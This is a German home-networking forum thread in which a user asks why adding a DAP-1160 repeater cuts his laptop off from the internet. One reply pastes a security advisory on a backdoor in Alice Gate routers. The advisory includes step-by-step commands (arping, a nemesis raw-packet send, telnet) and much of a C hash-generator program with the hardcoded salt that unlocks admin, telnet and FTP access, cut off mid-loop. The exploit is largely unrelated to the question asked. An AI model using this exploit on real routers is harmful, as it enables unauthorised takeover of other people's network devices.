Heimnetzwerke - WIFI, LAN, Router und Co 16.483 Themen, 80.749 Beiträge

wir funktioniert ein Repeater?

andygavr / 23 Antworten / Flachansicht Nickles

Hallo
ich habe einen Router
Alice Gate Voice 2 Plus wifi
im Erdgeschoss

Dann einen DAP-1160 als AP-Point im Erdgeschoss für TV und BlueRay, die sind per Kabel angeschlossen und funktionieren.

Im Keller habe ich vom Router nur -70/75 als Leistung und deshalb wollte ich einen Repeater dazuhaben. DIeser sollte nun die Verbindung für TV, Wii und Laptop im Keller herstellen und VERBESSERN

Ich habe also noch einen DAP-1160 gekauft und diesen als repeater konfiguriert.
Wenn ich diesen nun einstecke habe ich bei inSSIDer ein SSD mit -70 (mein Router) und ein "Netz" mit ca -30 (der Repeater)
SSD ist die gleiche, Kanal ist der Gleiche. Wlan Schlüssel ist der gleiche eingegeben.

Wenn ich nun beim Laptop schaue, kann ich mich mit dem "starken" Netz verbinden. Nach einiger Zeit (auch am nächsten Tag) bekomme ich aber nur noch "Momentan verbunden mit: MEINE SSD Zugriff: nur Lokal!
Wenn ich den Repeater ausstecke bekomme ich wieder Zugriff: "Lokal und Internet"

Der TV funktioniert nur mit Repeater (hatte sich vorher ohne nicht verbunden!)
Die Wii verbindet sich nur ohne Repeater

Was muss ich ändern? Es kann doch nicht sein, dass ich mit besserem Signal plötzlich nicht mehr ins Internet kann? (Der WLAN Drucker geht dann übrigens auch nicht - der ist doch aber "Lokal"?)

bei Antwort benachrichtigen
ok hab mir das mal... andygavr
Anzeige bei in SSIDer andygavr
Schau das mal an:... angelpage
Prosseco bilibi „Dann drück ich es für dich anders aus. Die Netzwerkadresse...“
Optionen

Dann lese mal vernuenftig:

http://www.securiteam.com/securitynews/6R00M00MUK.html

Vulnerable Systems:
 * Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli based on Broadcom platform.
 * AGA [Alice Gate2 plus Wi-Fi]
 * AGB [Alice Gate2 plus]
 * AG2P-AG3 [Alice Gate W2+]
 * AGPV-AGPF [Alice Gate VoIP 2 Plus Wi-Fi]

Telecom Italia is the most important Italian ISP offering an ADSL service named "Alice". Telecom Italia rent out with "Alice Adsl" service, different CPE Modem/Router among which the affected ones. The interface to configure these modems are made extremily poor by the provider to ensure more control. There's no way to enable telnet, FTP, TFTP or more advanced web pages from the web interface.

An attacker can activate and get unauthorized access to the routers administration interface and telnet/FTP/TFTP services from internal network. Every user in the LAN (or Wireless LAN) can nevertheless have access to the routers administration interface and telnet/FTP/TFTP. If an attacker can get access to the administrator interface and login, he has full control over the routers configuration.

Exploit:
To enable telnet/FTP/TFTP and web-admin interface it is necessary send a special IP packet to router specific ip 192.168.1.1. This works only from internal LAN where an attacker have and ip like 192.168.1.XX. The ip packet send to router must have the following feature:

1) IP-protocol-number 255 (there's a RAW SOCKET listening on the router)
2) Payload size 8 byte
3) The payload are the first 8 byte of a salted md5 of the mac address of device br0
4) br0 in these modems has the same mac of eth0

When the modem receives the packet all services will be enabled.

Example:
From a GNU/LINUX distrib:

1) Retrieve br0 maccaddress:
arping -I eth0 -c 2 192.168.1.1

ARPING 192.168.1.1 from 192.168.1.2 eth0
Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 8.419ms
Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 2.095ms
Sent 2 probes (1 broadcast(s))
Received 2 response(s)


2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte long file with the mac address. Run the application below and copy the output hash: 

3) Send ip packet to router ip 192.168.1.1 with 8 byte paylod file (with the tool you like)
nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

4)Telnet to router :

        telnet 192.168.1.1

        BCM96348 ADSL Router
        Login: admin
        Password:

HASH calculator:
/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet */
/* the mac must be in an hex file and has to be passed as argument to the program */

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include "md5.h"


/*
 * RFC 1321 compliant MD5 implementation
 *
 * Copyright (C) 2001-2003 Christophe Devine
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */



#define GET_UINT32(n,b,i) \
{ \
    (n) = ( (uint32) (b)[(i) ] ) \
        | ( (uint32) (b)[(i) + 1] << 8 ) \
        | ( (uint32) (b)[(i) + 2] << 16 ) \
        | ( (uint32) (b)[(i) + 3] << 24 ); \
}

#define PUT_UINT32(n,b,i) \
{ \
    (b)[(i) ] = (uint8) ( (n) ); \
    (b)[(i) + 1] = (uint8) ( (n) >> 8 ); \
    (b)[(i) + 2] = (uint8) ( (n) >> 16 ); \
    (b)[(i) + 3] = (uint8) ( (n) >> 24 ); \
}

void md5_starts( md5_context *ctx )
{
    ctx->total[0] = 0;
    ctx->total[1] = 0;

    ctx->state[0] = 0x67452301;
    ctx->state[1] = 0xEFCDAB89;
    ctx->state[2] = 0x98BADCFE;
    ctx->state[3] = 0x10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
    uint32 X[16], A, B, C, D;

    GET_UINT32( X[0], data, 0 );
    GET_UINT32( X[1], data, 4 );
    GET_UINT32( X[2], data, 8 );
    GET_UINT32( X[3], data, 12 );
    GET_UINT32( X[4], data, 16 );
    GET_UINT32( X[5], data, 20 );
    GET_UINT32( X[6], data, 24 );
    GET_UINT32( X[7], data, 28 );
    GET_UINT32( X[8], data, 32 );
    GET_UINT32( X[9], data, 36 );
    GET_UINT32( X[10], data, 40 );
    GET_UINT32( X[11], data, 44 );
    GET_UINT32( X[12], data, 48 );
    GET_UINT32( X[13], data, 52 );
    GET_UINT32( X[14], data, 56 );
    GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n)))

#define P(a,b,c,d,k,s,t) \
{ \
    a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \
}

    A = ctx->state[0];
    B = ctx->state[1];
    C = ctx->state[2];
    D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

    P( A, B, C, D, 0, 7, 0xD76AA478 );
    P( D, A, B, C, 1, 12, 0xE8C7B756 );
    P( C, D, A, B, 2, 17, 0x242070DB );
    P( B, C, D, A, 3, 22, 0xC1BDCEEE );
    P( A, B, C, D, 4, 7, 0xF57C0FAF );
    P( D, A, B, C, 5, 12, 0x4787C62A );
    P( C, D, A, B, 6, 17, 0xA8304613 );
    P( B, C, D, A, 7, 22, 0xFD469501 );
    P( A, B, C, D, 8, 7, 0x698098D8 );
    P( D, A, B, C, 9, 12, 0x8B44F7AF );
    P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
    P( B, C, D, A, 11, 22, 0x895CD7BE );
    P( A, B, C, D, 12, 7, 0x6B901122 );
    P( D, A, B, C, 13, 12, 0xFD987193 );
    P( C, D, A, B, 14, 17, 0xA679438E );
    P( B, C, D, A, 15, 22, 0x49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

    P( A, B, C, D, 1, 5, 0xF61E2562 );
    P( D, A, B, C, 6, 9, 0xC040B340 );
    P( C, D, A, B, 11, 14, 0x265E5A51 );
    P( B, C, D, A, 0, 20, 0xE9B6C7AA );
    P( A, B, C, D, 5, 5, 0xD62F105D );
    P( D, A, B, C, 10, 9, 0x02441453 );
    P( C, D, A, B, 15, 14, 0xD8A1E681 );
    P( B, C, D, A, 4, 20, 0xE7D3FBC8 );
    P( A, B, C, D, 9, 5, 0x21E1CDE6 );
    P( D, A, B, C, 14, 9, 0xC33707D6 );
    P( C, D, A, B, 3, 14, 0xF4D50D87 );
    P( B, C, D, A, 8, 20, 0x455A14ED );
    P( A, B, C, D, 13, 5, 0xA9E3E905 );
    P( D, A, B, C, 2, 9, 0xFCEFA3F8 );
    P( C, D, A, B, 7, 14, 0x676F02D9 );
    P( B, C, D, A, 12, 20, 0x8D2A4C8A );

#undef F
    
#define F(x,y,z) (x ^ y ^ z)

    P( A, B, C, D, 5, 4, 0xFFFA3942 );
    P( D, A, B, C, 8, 11, 0x8771F681 );
    P( C, D, A, B, 11, 16, 0x6D9D6122 );
    P( B, C, D, A, 14, 23, 0xFDE5380C );
    P( A, B, C, D, 1, 4, 0xA4BEEA44 );
    P( D, A, B, C, 4, 11, 0x4BDECFA9 );
    P( C, D, A, B, 7, 16, 0xF6BB4B60 );
    P( B, C, D, A, 10, 23, 0xBEBFBC70 );
    P( A, B, C, D, 13, 4, 0x289B7EC6 );
    P( D, A, B, C, 0, 11, 0xEAA127FA );
    P( C, D, A, B, 3, 16, 0xD4EF3085 );
    P( B, C, D, A, 6, 23, 0x04881D05 );
    P( A, B, C, D, 9, 4, 0xD9D4D039 );
    P( D, A, B, C, 12, 11, 0xE6DB99E5 );
    P( C, D, A, B, 15, 16, 0x1FA27CF8 );
    P( B, C, D, A, 2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

    P( A, B, C, D, 0, 6, 0xF4292244 );
    P( D, A, B, C, 7, 10, 0x432AFF97 );
    P( C, D, A, B, 14, 15, 0xAB9423A7 );
    P( B, C, D, A, 5, 21, 0xFC93A039 );
    P( A, B, C, D, 12, 6, 0x655B59C3 );
    P( D, A, B, C, 3, 10, 0x8F0CCC92 );
    P( C, D, A, B, 10, 15, 0xFFEFF47D );
    P( B, C, D, A, 1, 21, 0x85845DD1 );
    P( A, B, C, D, 8, 6, 0x6FA87E4F );
    P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
    P( C, D, A, B, 6, 15, 0xA3014314 );
    P( B, C, D, A, 13, 21, 0x4E0811A1 );
    P( A, B, C, D, 4, 6, 0xF7537E82 );
    P( D, A, B, C, 11, 10, 0xBD3AF235 );
    P( C, D, A, B, 2, 15, 0x2AD7D2BB );
    P( B, C, D, A, 9, 21, 0xEB86D391 );

#undef F

    ctx->state[0] += A;
    ctx->state[1] += B;
    ctx->state[2] += C;
    ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
    uint32 left, fill;

    if( ! length ) return;

    left = ctx->total[0] & 0x3F;
    fill = 64 - left;

    ctx->total[0] += length;
    ctx->total[0] &= 0xFFFFFFFF;

    if( ctx->total[0] < length )
        ctx->total[1]++;

    if( left && length >= fill )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, fill );
        md5_process( ctx, ctx->buffer );
        length -= fill;
        input += fill;
        left = 0;
    }

    while( length >= 64 )
    {
        md5_process( ctx, input );
        length -= 64;
        input += 64;
    }

    if( length )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, length );
    }
}

static uint8 md5_padding[64] =
{
 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
    uint32 last, padn;
    uint32 high, low;
    uint8 msglen[8];
        

    high = ( ctx->total[0] >> 29 )
         | ( ctx->total[1] << 3 );
    low = ( ctx->total[0] << 3 );

    PUT_UINT32( low, msglen, 0 );
    PUT_UINT32( high, msglen, 4 );

    //for(int i=0;i<8;i++) printf("length %d\n",msglen[i]);
        
        last = ctx->total[0] & 0x3F;
    padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last );

    md5_update( ctx, md5_padding, padn );
    md5_update( ctx, msglen, 8 );

    PUT_UINT32( ctx->state[0], digest, 0 );
    PUT_UINT32( ctx->state[1], digest, 4 );
    PUT_UINT32( ctx->state[2], digest, 8 );
    PUT_UINT32( ctx->state[3], digest, 12 );
}

//#ifdef TEST



/*
 * those are the standard RFC 1321 test vectors
 */

static char *msg[] =
{
    "",
    "a",
    "abc",
    "message digest",
    "abcdefghijklmnopqrstuvwxyz",
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    "12345678901234567890123456789012345678901234567890123456789012" \
        "345678901234567890"
};

static char *val[] =
{
    "d41d8cd98f00b204e9800998ecf8427e",
    "0cc175b9c0f1b6a831c399e269772661",
    "900150983cd24fb0d6963f7d28e17f72",
    "f96b697d7cb7938d525a2f31aaf161d0",
    "c3fcd3d76192e4007dfb496cca67e13b",
    "d174ab98d277d9f5a5611c2c9f419d9f",
    "57edf4a22be3c955ac49da2e2107b67a"
};

static char saltOrig[] =
{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, 0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33};

int main( int argc, char *argv[] )
{
    FILE *f;
    int i, j;
    char output[33];
    md5_context ctx;
    unsigned char buf[1000];
    unsigned char md5sum[16];
        unsigned char salt[20];
        
        printf( "****************************\n");
        printf( "Alice BackDoor hash creator \n");
        printf( "by saxdax and drPepperOne \n");
        printf( "****************************\n\n");
    
        if( argc < 2 )
    {
      printf( "\n Usage: %s pathfileMAC\n\n", argv[0] );
          return 0;
    }
    
    if( ! ( f = fopen( argv[1], "rb" ) ) )
    {
        perror( "fopen" );
        return( 1 );
    }

    md5_starts( &ctx );

    while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 )
    {
        md5_update( &ctx, buf, i );
    }
        
        memcpy(salt, saltOrig, 20);
        
        md5_update( &ctx, salt, 20 );

    md5_finish( &ctx, md5sum );
        
        printf("Payload is: ");
    for( j = 0; j < 8; j++ )
    {
        printf( "%02x", md5sum[j] );
    

Gruss
Sascha

Das ist keine Signatur. Sondern ich putz hier nur
bei Antwort benachrichtigen